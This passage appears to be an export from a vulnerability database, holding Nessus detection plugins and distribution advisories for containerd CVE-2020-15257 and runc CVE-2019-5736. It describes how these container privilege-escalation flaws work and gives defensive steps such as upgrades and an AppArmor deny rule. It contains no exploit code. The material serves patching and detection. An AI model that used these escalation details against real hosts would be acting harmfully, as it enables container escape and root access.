0, but did not otherwise restrict\n access to the abstract Unix domain socket. This would\n allow malicious containers running in the same network\n namespace as the shim, with an effective UID of 0 but\n otherwise reduced privileges, to cause new processes to\n be run with elevated privileges. This vulnerability has\n been fixed in containerd 1.3.9 and 1.4.3. Users should\n update to these versions as soon as they are released.\n It should be noted that containers started with an old\n version of containerd-shim should be stopped and\n restarted, as running containers will continue to be\n vulnerable even after an upgrade. If you are not\n providing the ability for untrusted users to start\n containers in the same network namespace as the shim\n (typically the 'host' network namespace, for example\n with docker run --net=host or hostNetwork: true in a\n Kubernetes pod) and run with an effective UID of 0, you\n are not vulnerable to this issue. If you are running\n containers with a vulnerable configuration, you can\n deny access to all abstract sockets with AppArmor by\n adding a line similar to deny unix addr=@**, to your\n policy. It is best practice to run containers with a\n reduced set of privileges, with a non-zero UID, and\n with isolated namespaces. The containerd maintainers\n strongly advise against sharing namespaces with the\n host. Reducing the set of isolation mechanisms used for\n a container necessarily increases that container's\n privilege, regardless of what container runtime is used\n for running that container.(CVE-2020-15257)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2021-02-05T00:00:00", "title": "EulerOS 2.0 SP9 : kata-containers (EulerOS-SA-2021-1245)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kata-containers", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1245.NASL", "href": "https://www.tenable.com/plugins/nessus/146252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146252);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2020-15257\"\n );\n\n script_name(english:\"EulerOS 2.0 SP9 : kata-containers (EulerOS-SA-2021-1245)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kata-containers package installed,\nthe EulerOS installation on the remote host is affected by the\nfollowing vulnerability :\n\n - containerd is an industry-standard container runtime\n and is available as a daemon for Linux and Windows. In\n containerd before versions 1.3.9 and 1.4.3, the\n containerd-shim API is improperly exposed to host\n network containers. Access controls for the shim's API\n socket verified that the connecting process had an\n effective UID of 0, but did not otherwise restrict\n access to the abstract Unix domain socket. This would\n allow malicious containers running in the same network\n namespace as the shim, with an effective UID of 0 but\n otherwise reduced privileges, to cause new processes to\n be run with elevated privileges. This vulnerability has\n been fixed in containerd 1.3.9 and 1.4.3. Users should\n update to these versions as soon as they are released.\n It should be noted that containers started with an old\n version of containerd-shim should be stopped and\n restarted, as running containers will continue to be\n vulnerable even after an upgrade. If you are not\n providing the ability for untrusted users to start\n containers in the same network namespace as the shim\n (typically the 'host' network namespace, for example\n with docker run --net=host or hostNetwork: true in a\n Kubernetes pod) and run with an effective UID of 0, you\n are not vulnerable to this issue. If you are running\n containers with a vulnerable configuration, you can\n deny access to all abstract sockets with AppArmor by\n adding a line similar to deny unix addr=@**, to your\n policy. It is best practice to run containers with a\n reduced set of privileges, with a non-zero UID, and\n with isolated namespaces. The containerd maintainers\n strongly advise against sharing namespaces with the\n host. Reducing the set of isolation mechanisms used for\n a container necessarily increases that container's\n privilege, regardless of what container runtime is used\n for running that container.(CVE-2020-15257)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?15b50a4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kata-containers package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kata-containers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kata-containers-v1.11.1-6.h13.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kata-containers\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-29T01:20:51", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the ALAS-2020-1455 advisory.\n\n - Access controls for the shim's API socket verified that the connecting process had an effective UID of 0,\n but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious\n containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise\n reduced privileges, to cause new processes to be run with elevated privileges. (CVE-2020-15257)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2020-11-30T00:00:00", "title": "Amazon Linux AMI : containerd (ALAS-2020-1455)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2020-11-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:containerd-stress", "p-cpe:/a:amazon:linux:containerd", "p-cpe:/a:amazon:linux:containerd-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2020-1455.NASL", "href": "https://www.tenable.com/plugins/nessus/143367", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2020-1455.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143367);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-15257\");\n script_xref(name:\"ALAS\", value:\"2020-1455\");\n\n script_name(english:\"Amazon Linux AMI : containerd (ALAS-2020-1455)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the ALAS-2020-1455 advisory.\n\n - Access controls for the shim's API socket verified that the connecting process had an effective UID of 0,\n but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious\n containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise\n reduced privileges, to cause new processes to be run with elevated privileges. (CVE-2020-15257)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2020-1455.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15257\");\n script_set_attribute(attribute:\"solution\", value:\n\"\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15257\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:containerd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:containerd-stress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'containerd-1.4.1-2.6.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'containerd-debuginfo-1.4.1-2.6.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'containerd-stress-1.4.1-2.6.amzn1', 'cpu':'x86_64', 'release':'ALA'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"containerd / containerd-debuginfo / containerd-stress\");\n}", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-29T01:09:44", "description": "An update of the containerd package has been released.", "edition": 3, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2020-12-03T00:00:00", "title": "Photon OS 3.0: Containerd PHSA-2020-3.0-0168", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2020-12-03T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:containerd", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0168_CONTAINERD.NASL", "href": "https://www.tenable.com/plugins/nessus/143448", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0168. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143448);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-15257\");\n\n script_name(english:\"Photon OS 3.0: Containerd PHSA-2020-3.0-0168\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the containerd package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-168.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15257\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'containerd-1.3.7-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'containerd-doc-1.3.7-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'containerd-extras-1.3.7-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'containerd');\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2020-12-09T19:40:52", "bulletinFamily": "unix", "cvelist": ["CVE-2020-15257"], "description": "Arch Linux Security Advisory ASA-202012-8\n=========================================\n\nSeverity: High\nDate : 2020-12-05\nCVE-ID : CVE-2020-15257\nPackage : containerd\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-1309\n\nSummary\n=======\n\nThe package containerd before version 1.4.3-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 1.4.3-1.\n\n# pacman -Syu \"containerd>=1.4.3-1\"\n\nThe problem has been fixed upstream in version 1.4.3.\n\nWorkaround\n==========\n\nIf you are not providing the ability for untrusted users to start\ncontainers in the same network namespace as the shim (typically the\n\"host\" network namespace, for example with docker run --net=host or\nhostNetwork: true in a Kubernetes pod) and run with an effective UID of\n0, you are not vulnerable to this issue.\n\nIf you are running containers with a vulnerable configuration, you can\ndeny access to all abstract sockets with AppArmor by adding a line\nsimilar to deny unix addr=@**, to your policy.\n\nIt is best practice to run containers with a reduced set of privileges,\nwith a non-zero UID, and with isolated namespaces. The containerd\nmaintainers strongly advise against sharing namespaces with the host.\nReducing the set of isolation mechanisms used for a container\nnecessarily increases that container's privilege, regardless of what\ncontainer runtime is used for running that container.\n\nDescription\n===========\n\nIn containerd before versions 1.3.9 and 1.4.3, the containerd-shim API\nis improperly exposed to host network containers. Access controls for\nthe shim's API socket verified that the connecting process had an\neffective UID of 0, but did not otherwise restrict access to the\nabstract Unix domain socket. This would allow malicious containers\nrunning in the same network namespace as the shim, with an effective\nUID of 0 but otherwise reduced privileges, to cause new processes to be\nrun with elevated privileges.\n\nIt should be noted that containers started with an old version of\ncontainerd-shim should be stopped and restarted, as running containers\nwill continue to be vulnerable even after an upgrade.\n\nImpact\n======\n\nA local attacker might be able to escalate privileges via a malicious\ncontainer running in the same network namespace as the shim.\n\nReferences\n==========\n\nhttps://github.com/containerd/containerd/security/advisories/GHSA-36xw-fx78-c5r4\nhttps://github.com/containerd/containerd/commit/428f10fd27eb1f9bd0b9aaa33a6579416c3a8b12\nhttps://github.com/containerd/containerd/commit/ae3a64aa10d6d9b1567adce057778800c9cc45ed\nhttps://security.archlinux.org/CVE-2020-15257", "modified": "2020-12-05T00:00:00", "published": "2020-12-05T00:00:00", "id": "ASA-202012-8", "href": "https://security.archlinux.org/ASA-202012-8", "type": "archlinux", "title": "[ASA-202012-8] containerd: privilege escalation", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Arch Linux Security Advisory ASA-201902-6\n=========================================\n\nSeverity: High\nDate : 2019-02-11\nCVE-ID : CVE-2019-5736\nPackage : runc\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-878\n\nSummary\n=======\n\nThe package runc before version 1.0.0rc6-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 1.0.0rc6-1.\n\n# pacman -Syu \"runc>=1.0.0rc6-1\"\n\nThe problem has been fixed upstream in version 1.0.0rc6.\n\nWorkaround\n==========\n\nDon't run privileged containers.\n\nDescription\n===========\n\nA vulnerability discovered in runc through 1.0-rc6, as used in Docker\nbefore 18.09.2 and other products, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by\nleveraging the ability to execute a command as root within one of these\ntypes of containers: (1) a new container with an attacker-controlled\nimage, or (2) an existing container, to which the attacker previously\nhad write access, that can be attached with docker exec. This occurs\nbecause of file-descriptor mishandling, related to /proc/self/exe.\n\nImpact\n======\n\nA malicious container can escalate privileges to gain access as root on\nthe host system and execute arbitrary code.\n\nReferences\n==========\n\nhttps://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nhttps://www.openwall.com/lists/oss-security/2019/02/11/2\nhttps://security.archlinux.org/CVE-2019-5736", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "ASA-201902-6", "href": "https://security.archlinux.org/ASA-201902-6", "type": "archlinux", "title": "[ASA-201902-6] runc: privilege escalation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-12-08T15:11:20", "bulletinFamily": "unix", "cvelist": ["CVE-2020-15257"], "description": "It was discovered that access controls for the shim\u2019s API socket did not \nrestrict access to the abstract unix domain socket in some cases. An attacker \ncould use this vulnerability to run containers with elevated privileges.", "edition": 2, "modified": "2020-11-30T00:00:00", "published": "2020-11-30T00:00:00", "id": "USN-4653-1", "href": "https://ubuntu.com/security/notices/USN-4653-1", "title": "containerd vulnerability", "type": "ubuntu", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}], "amazon": [{"lastseen": "2020-12-08T13:22:29", "bulletinFamily": "unix", "cvelist": ["CVE-2020-15257"], "description": "**Issue Overview:**\n\nAccess controls for the shim's API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. ([CVE-2020-15257 __](<https://access.redhat.com/security/cve/CVE-2020-15257>))\n\n \n**Affected Packages:** \n\n\ncontainerd\n\n \n**Issue Correction:** \nIf you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the \"host\" network namespace, for example with `docker run --net=host` or `hostNetwork: true` in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue.\n\n \n\n\n**New Packages:**\n \n \n src: \n containerd-1.4.1-2.6.amzn1.src \n \n x86_64: \n containerd-1.4.1-2.6.amzn1.x86_64 \n containerd-stress-1.4.1-2.6.amzn1.x86_64 \n containerd-debuginfo-1.4.1-2.6.amzn1.x86_64 \n \n \n", "edition": 2, "modified": "2020-11-20T17:29:00", "published": "2020-11-20T17:29:00", "id": "ALAS-2020-1455", "href": "https://alas.aws.amazon.com/ALAS-2020-1455.html", "title": "Important: containerd", "type": "amazon", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-15257"], "description": " Containerd is an industry-standard container runtime with an emphasis on simplicity, robustness and portability. It is available as a daemon for Lin ux and Windows, which can manage the complete container lifecycle of its host system: image transfer and storage, container execution and supervision, low-level storage and network attachments, etc. ", "modified": "2020-12-10T01:15:52", "published": "2020-12-10T01:15:52", "id": "FEDORA:3E17230B6FC0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: containerd-1.4.3-1.fc33", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-05-03T03:43:36", "published": "2019-05-03T03:43:36", "id": "FEDORA:D35EC607603A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: runc-1.0.0-92.dev.gitc1b8c57.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This me ans they can run anywhere, from your laptop to the largest EC2 compute instance and everything in between - and they don't require you to use a particular language, framework or packaging system. That makes them great building blo cks for deploying and scaling web apps, databases, and backend services without depending on a particular stack or provider. ", "modified": "2019-02-19T05:54:38", "published": "2019-02-19T05:54:38", "id": "FEDORA:E1B606076F4E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: moby-engine-18.06.0-2.ce.git0ffa825.fc28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. The python3-lxc package contains the Python3 binding for LXC. ", "modified": "2019-09-06T12:59:40", "published": "2019-09-06T12:59:40", "id": "FEDORA:6381060486F6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: python3-lxc-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-05-03T01:00:03", "published": "2019-05-03T01:00:03", "id": "FEDORA:1D3BD6049C24", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: runc-1.0.0-92.dev.gitc1b8c57.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This me ans they can run anywhere, from your laptop to the largest EC2 compute instance and everything in between - and they don't require you to use a particular language, framework or packaging system. That makes them great building blo cks for deploying and scaling web apps, databases, and backend services without depending on a particular stack or provider. ", "modified": "2019-02-19T14:04:24", "published": "2019-02-19T14:04:24", "id": "FEDORA:813AC604EC12", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: moby-engine-18.06.0-2.ce.git0ffa825.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-02-21T01:39:49", "published": "2019-02-21T01:39:49", "id": "FEDORA:3A64160C815D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: runc-1.0.0-68.dev.git6635b4f.fc28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", 